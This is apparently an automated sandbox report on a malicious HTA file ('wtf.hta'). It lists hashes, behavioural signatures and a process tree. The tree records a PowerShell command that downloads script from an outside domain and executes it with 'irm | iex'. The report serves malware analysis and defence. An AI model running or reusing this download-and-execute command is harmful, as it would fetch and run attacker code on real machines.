Analysis

max time kernel: 122s
max time network: 123s
platform: windows7_x64
resource: win7-20231129-en
resource tags: arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
submitted: 08-04-2024 07:46

Static task: static1
Behavioral task: behavioral1
Sample: wtf.hta
Resource: win7-20231129-en (windows7-x64)
5 signatures
300 seconds
General

Target: wtf.hta
Size: 46KB
MD5: 5fbdd6357b961e941acd3c06ba2e867e
SHA1: ac1f9b5ffd9c6fa8790bf235f73bd53f699c527b
SHA256: f135e8b3678ef36330cc8e8f1986cf40d83fb4159c8d5363ba44b78d14f85f17
SHA512: c63211263355c854c19964c37cd9857e08a90a694e087bfe6e5c1d35cc579ae75b9e5c5279172c8b24ce925a3476408ded33a32d09f7cc5b820e0cbd1dbb2907
SSDEEP: 768:2bang59+ttT+fEV8yEH445wBodvJdgg6i1UY8o53YH:2baXLWEXEp5wcdgziK/H
Score: 10/10
Malware Config
Signatures
Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes: powershell.exe
  description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
  pid: 2764
  pid_target: 860
  process: powershell.exe

Drops file in System32 directory (1 IoC)
Processes: powershell.exe
  description: File opened for modification
  ioc: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
  process: powershell.exe

Modifies Internet Explorer settings
Processes: mshta.exe
  description: Key created
  ioc: \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main
  process: mshta.exe

Suspicious behavior: EnumeratesProcesses (1 IoC)
Processes: powershell.exe
  pid: 2764
  process: powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes: powershell.exe
  description: Token: SeDebugPrivilege
  pid: 2764
  process: powershell.exe
Processes
C:\Windows\SysWOW64\mshta.exe
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\wtf.hta"
  - Modifies Internet Explorer settings
  PID: 3040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -Command irm https://sevensunday.co.ke/tete/describe.tet | iex
  - Process spawned unexpected child process
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 2764